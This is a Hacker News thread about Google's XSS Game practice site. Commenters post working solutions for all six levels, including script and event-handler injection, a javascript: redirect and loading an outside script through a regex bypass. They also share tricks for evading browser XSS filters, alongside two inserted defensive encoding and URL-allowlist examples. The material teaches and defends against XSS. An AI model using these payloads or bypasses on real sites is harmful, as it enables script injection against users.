
The XSS Game by Google - artf
https://xss-game.appspot.com/
======
throwaway729
Solutions: [http://pastebin.com/hv0h73eC](http://pastebin.com/hv0h73eC)

I'm posting because I find that whenever I can't solve some security puzzle,
it usually means I didn't foresee an attack and I've been writing insecure
code :( So hopefully people who get stumped can take a look at the solutions
and determine if that's the case for them.

It'd be cool if someone wrote up explanations for each of these w/ links to
relevant portions of Google's documentation.

~~~
randyrand
I know you posted on pastebin with 'never' for a reason. But in case they ever
shut down, here is the text:

    
    
    # lvl 1

    Enter `<script>alert('')</script>` into the search box.

    # lvl 2

    Use the `onclick` attribute of the font tag (hint is from the first post, which shows `<font>` might be allowed for the purpose of changing colors). Winning message:

        <font color="red" onclick="alert('')">blah</font>

    and then click blah after posting the message. (or use onload etc.)

    # lvl 3

    Modify the URL parameter so that you inject code into the `<img>` tag:

        https://xss-game.appspot.com/level3/frame#1.jpg' onclick="alert('')" alt='a picture called 1

    which will render as:

        html += "<img src='/static/level3/cloud/1.jpg' onclick="alert('')" alt='a picture called 1.jpg'/>";

    on line 17 of the HTML file. Now click on the picture.

    # lvl 4

    Use `3'); alert('` as the value for your timer.

    # lvl 5

    Notice that if you type `javascript:alert('')` into your browser location bar, an alert will pop up. So we'll use this as the location that the user is sent to on the signup page. Go to the URL:

        https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('')

    and then click the `Next` link.

    # lvl 6

    The regex only notices lowercase https. So upload this JS file to some URL http://mysite.com/xss.js:

        alert('');

    and then go to the url `https://xss-game.appspot.com/level6/frame#Http://mysite.com/xss.js`

    # Notes

    In an actual attack you'd use onerror or onload everywhere instead of onclick.
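
Added here as a defender's counterpart to the walkthrough above (example code, not the game's own source): context-aware output encoding for the reflection points in levels 1, 3 and 4, where the same kind of payload lands in a different HTML context each time. Function names, the static paths, the `data-seconds` attribute and the default of 3 seconds are assumptions made for this example.

```javascript
// Added example, not the game's source: context-aware output encoding for
// the reflection points in levels 1, 3 and 4. Each HTML context needs its
// own treatment; HTML-escaping the element body (level 1) is not enough
// for a single-quoted attribute (level 3) or a value that ends up inside
// JavaScript (level 4). Paths, names and the default are assumptions.

// Replace the five characters that can change meaning inside element text
// or inside a quoted attribute value.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Wrap a value as a single-quoted attribute. Because "'" is escaped, the
// level 3 payload "1.jpg' onclick=..." cannot close the attribute early.
function attr(value) {
  return "'" + escapeHtml(value) + "'";
}

// Level 1 context: element body. The vulnerable page echoes the query raw
// between <b> and </b>; escaping keeps <script> as literal text.
function renderSearch(query) {
  return "Sorry, no results were found for <b>" + escapeHtml(query) + "</b>.";
}

// Level 3 context: a single-quoted src attribute built from location.hash.
// An allowlist (digits only) would be stronger still; the encoding alone
// is shown here so its effect on the payload is visible.
function renderImage(num) {
  return "<img src=" + attr("/static/level3/cloud/" + num + ".jpg") + " />";
}

// Level 4 context: a value that originally ends up inside a JavaScript
// string in an inline handler. Rather than quoting it by hand, keep it out
// of code entirely: validate it as a non-negative integer and hand it to a
// static script through a data attribute (assumed default: 3 seconds).
function renderTimer(timer) {
  const n = Number.parseInt(timer, 10);
  const seconds = Number.isFinite(n) && n >= 0 ? n : 3;
  return '<img src="/static/loading.gif" data-seconds="' + seconds + '" />';
}

// Constructed inputs: the walkthrough's payloads for levels 1, 3 and 4.
console.log(renderSearch("<script>alert('')</script>"));
console.log(renderImage("1.jpg' onclick=\"alert('')\" alt='a picture called 1"));
console.log(renderTimer("3'); alert('"));
```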

~~~
dstjean
Level 6: You can exclude the protocol entirely (e.g. "//news.ycombinator.com").

This will ensure the browser uses the "current protocol": if your website is
browsable from http, all requests to //www...com will be http, and if your page
is fetched using https, all resources starting with //www.hn.com will be
loaded using https.

If your website was reachable from protocol xyz://mydomain.com, all resources
starting with // would be fetched using the xyz:// protocol.

~~~
jtinder
or you can simply add a space after #
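
The level 5 and level 6 bypasses discussed above (mixed-case scheme, protocol-relative `//host`, a leading space, and the `javascript:` scheme) all defeat a string-prefix or regex check. An allowlist check that normalizes the URL first, added here as example code that is not the game's own source: the page origin, the CDN origin and the function names are assumptions.

```javascript
// Added example, not the game's own source: an allowlist check for the two
// places these levels take a URL from the attacker, the level 5 "next"
// redirect and the level 6 script location. The WHATWG URL parser (global
// `URL` in Node >= 10 and in browsers) resolves the input exactly as the
// browser will, so the thread's bypasses of a lowercase-"https" regex
// (mixed-case scheme, leading space, protocol-relative "//host") are all
// normalized away before the comparison.

// Origin of the page doing the loading/redirecting. Assumed value.
const PAGE_ORIGIN = "https://xss-game.appspot.com";
// Origins a script may be loaded from. The CDN origin is a made-up example.
const SCRIPT_ORIGINS = [PAGE_ORIGIN, "https://cdn.example"];

/**
 * Resolve `input` relative to `base` and return the normalized absolute URL
 * if it is https and its origin is in `allowedOrigins`; otherwise null.
 */
function resolveAllowedUrl(input, allowedOrigins, base = PAGE_ORIGIN) {
  if (typeof input !== "string") return null;
  let u;
  try {
    // new URL() strips leading/trailing whitespace and lower-cases the
    // scheme, so " Http://x" becomes http://x before we look at it.
    u = new URL(input, base);
  } catch (e) {
    return null; // unparsable input is rejected, never passed through
  }
  // Compare the normalized scheme: "Http:", "javascript:", "data:" all fail.
  if (u.protocol !== "https:") return null;
  // Exact origin match rather than a prefix/regex match, so "//evil.test"
  // (resolved to https://evil.test) and "https://xss-game.appspot.com.evil.test"
  // are both rejected.
  if (!allowedOrigins.includes(u.origin)) return null;
  return u.href;
}

// Level 6: URL the page is about to load a gadget script from.
function safeScriptUrl(input) {
  return resolveAllowedUrl(input, SCRIPT_ORIGINS);
}

// Level 5: where the signup page sends the user next. Same-origin only, and
// the caller redirects to the returned absolute URL, never to `input`.
function safeNextUrl(input) {
  return resolveAllowedUrl(input, [PAGE_ORIGIN]);
}

// Constructed inputs: the thread's bypasses plus three legitimate values.
const samples = [
  "/static/level6/gadget.js",
  "https://cdn.example/lib.js",
  "confirm",
  "Http://mysite.com/xss.js",
  " Http://mysite.com/xss.js",
  "//news.ycombinator.com/x.js",
  "https://xss-game.appspot.com.evil.test/x.js",
  "javascript:alert('')",
];
for (const s of samples) {
  console.log(JSON.stringify(s), "script:", safeScriptUrl(s), "next:", safeNextUrl(s));
}
```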

------
eridius
Why does a <script> tag not work in level 2? I can see it ending up in the
DOM.

Edit: Ah hah, HTML 5 spec explicitly says <script> tags inserted via innerHTML
do not execute ([https://www.w3.org/TR/2008/WD-html5-20080610/dom.html#innerh...](https://www.w3.org/TR/2008/WD-html5-20080610/dom.html#innerhtml0)).

~~~
cozuya
That probably explains why it's also stripped from React's not-so-accurately
named "DangerouslySetInnerHTML" method..

------
xssfoofoo
Level 3 seems to no longer be exploitable. Firefox 45.5 here automatically
%-encodes the characters into the src attribute.

~~~
xssfoofoo
this app appears to be at least 2.5 years old.

~~~
flanbiscuit
previous hacker news discussion from 2014 about it:
[https://news.ycombinator.com/item?id=7815237](https://news.ycombinator.com/item?id=7815237)

------
jaimehrubiks
I'd like to see the game solutions, I'm new to this and can't pass lv 3.

~~~
Warp__
Firefox breaks lv 3. See my comment below if you'd like to get past that
stage.

------
giuscri
These challenges are very easy. Anyone who knows something harder? To my
knowledge, it's not easy to find material to study/exploit to get better at
XSS'ing.

~~~
fapjacks
OverTheWire [0] has been my personal favorite for many years. Some of them are
really challenging!

[http://overthewire.org/wargames/](http://overthewire.org/wargames/)

~~~
giuscri
Sure. But I was searching for something XSS specific

------
onion2k
I'm quite surprised that these exploits aren't blocked at the browser level by
default with developers having to write code to make the exploits work if they
need to.

For example, if browsers flatly refused to load code from an external URL
unless the address was whitelisted in the page's HTTP response headers then
you'd make level 6's exploit impossible without much of an impact on web
development.

The CORS header Access-Control-Allow-Origin can be used to force a browser to
work that way, but only if a site sets it. I'm suggesting we're at the point
now where browsers should be secure by default, even if it breaks some old
sites.

~~~
fastest963
If you look at the source, they're actually disabling the XSS protections in
the browser:

    # Disable the reflected XSS filter for demonstration purposes
    self.response.headers.add_header("X-XSS-Protection", "0")

~~~
dylanfw
Chrome's XSS filter can still be circumvented in quite a few instances. The
easiest way I've seen is when the attacker controls at least two variables and
can split the XSS across them in such a way that neither half appears
malicious but when loaded into the page they create a malicious script.

Example: ?a=<script>void('&b=');alert('XSS')</script>

The value of a is <script>void(' and the value of b is
');alert('XSS')</script>.

------
partizanos
Did someone get why they prompt us to go to
[https://tools.ietf.org/html/draft-hoehrmann-javascript-schem...](https://tools.ietf.org/html/draft-hoehrmann-javascript-scheme-00) ?
I didn't get it.

The mechanism next=javascript:alert('') with the colon, how is it called? Are
there examples of using anything other than javascript before the colon? It was a
very great tutorial:)

------
i336_
Got to the first one.

Okay, URL injection, that's easy: <script>alert('hi');</script>

Or not: that didn't work.

I had to remove the semicolon for it to notice my code. At that point I
immediately closed the tab.

~~~
yathern
Do you... realize it's actually a live webpage you're testing on? It's not like
the server checks to see if you wrote exactly the right answer. It just checks
to see if an alert is fired. If it didn't work, it's because you didn't do it
right.

<script>alert()</script> most certainly works unless you have noscript.

~~~
i336_
Yes, but if you try

    https://xss-game.appspot.com/level1/frame?query=<script>alert('hi');</script>

it doesn't work.

    https://xss-game.appspot.com/level1/frame?query=<script>alert('hi')</script>

without the semicolon does.

I realize it's JS, but I can see it's just dumbly parsing what I've typed as
opposed to eg overloading alert() (which can be done:
[http://stackoverflow.com/questions/1729501/javascript-overri...](http://stackoverflow.com/questions/1729501/javascript-overriding-alert))
and demonstrating/using best practices in the source code to prevent
the JS I type from actually damaging the demo itself.

For something that's _really_ interesting, search Pinterest for "reactjs", and
see if you get the "Hack Pinterest" tile as your first result. _That_ was fun
to play with!

~~~
CGamesPlay
Open your web inspector, set the console target to the iframe, and type
"alert". Notice that the alert function is overridden.

Set your URL to [https://xss-game.appspot.com/level1/frame?query=a;b](https://xss-game.appspot.com/level1/frame?query=a;b).
Notice that the ";b" is removed from the results page.

Challenge your initial assumption about the checker being stupidly naive.
Notice XSS bugs in your own code afterwards.

~~~
i336_
Thanks. I'll admit this is a field I'm completely unfamiliar with. (I was
actually considering bug bounty hunting in the future, thanks for the wake up
call.)

I actually noticed the ; was being removed and am very confused as to why, but
forgot to mention that in my earlier comment.

~~~
CGamesPlay
Full disclosure: I didn't bother to learn about why the ; is being split. But
I can hasten a guess: the python web server treats that as a parameter
separator.

... and confirmed.

[1] [https://www.google.com/webhp?q=webapp.WSGIApplication+semico...](https://www.google.com/webhp?q=webapp.WSGIApplication+semicolon)
[2] [https://groups.google.com/forum/#!topic/google-appengine/Aai...](https://groups.google.com/forum/#!topic/google-appengine/Aai8ShndteA)
[3] [https://www.w3.org/TR/REC-html40/appendix/notes.html#h-B.2.2](https://www.w3.org/TR/REC-html40/appendix/notes.html#h-B.2.2)

~~~
i336_
Ah, I see. That makes perfect sense, thanks for explaining it :)

------
fgandiya
Hey, I just used this a few weeks ago as I was doing this course on web app
security by Troy Hunt[0]

I didn't get far with it because it turns out that some browsers prevent the
exploit, like Firefox and Safari.

[0] [https://www.pluralsight.com/courses/hack-yourself-first?gcli...](https://www.pluralsight.com/courses/hack-yourself-first?gclid=CjwKEAiAmdXBBRD0hZCVkYHTl20SJACWsZj9cTLBFQsqJzN1Y1EwTHW_yGErNY-nkQLG8Q4mipLf8BoC7djw_wcB)

------
Kenji
_There will be cake at the end of the test._

The cake is a lie.

~~~
rainboiboi
There you go...

    
    
    [ASCII-art image of a cake with a candle]
    
        
    

You have successfully completed the game!

~~~
Kenji
This is not a pipe.

~~~
freecodyx
So what is it, then?

~~~
Fluid_Mechanics
our end

    [the same cake ASCII art, upside down]

~~~
freecodyx
Not bad, I imagine you wrote a script to flip the thing..

------
prezjordan
I made it past level 2 but I am curious why the second hint is true. Can
anyone provide some insights?

~~~
anowlcalledjosh
I think it's because the <script> tag gets inserted after the page loads,
which browsers won't execute automatically.

------
bl0bgate4
this is similar to
[https://www.codebashing.com/sql_demo](https://www.codebashing.com/sql_demo)

------
samfisher83
Some of these exploits won't work on firefox or I am not sure how to do it.
For example I can't get firefox to execute code on images.

~~~
eyeareque
You can try turning off JavaScript Xss filtering in Firefox, via about:config
--> browser.urlbar.filter.javascript

~~~
samfisher83
Thanks, I spent way too much time on that. In case anyone is using
Firefox, make sure to turn this stuff off.

BTW, why doesn't Chrome also filter this? I can't think of a legit reason to
do some of this stuff.

------
splitdisk
I'll always love stuff like this, such a fun way to practice without the
pressure of finding something to report on.

------
freecodyx
I just call alert('dada') from the console, and it tells me congratulations,
the site is buggy as well

~~~
Buge
The victim of your XSS attack will not use the console, so when creating an XSS
attack it shouldn't require the use of the console to activate it.

I can break any website for myself by putting stuff in the console.

------
EJTH
It was fun the few minutes it lasted. :)

------
Keloo
on level 4 try: [https://xss-game.appspot.com/level4/frame?timer=%99](https://xss-game.appspot.com/level4/frame?timer=%99)
and you get: 500 internal server error LOL

------
elcapitan
That was fun, but a bit too easy ;)

------
jamesmp98
Well that was fun

------
jkulak
I don't know, not being able to pass lvl1 with "<script>alert();" made me not
want to continue...

~~~
throwaway729
Because you end up with:

    
    
    Sorry, no results were found for <b><script>alert();</b>.
    

which is a syntax error. You need the closing </script>.

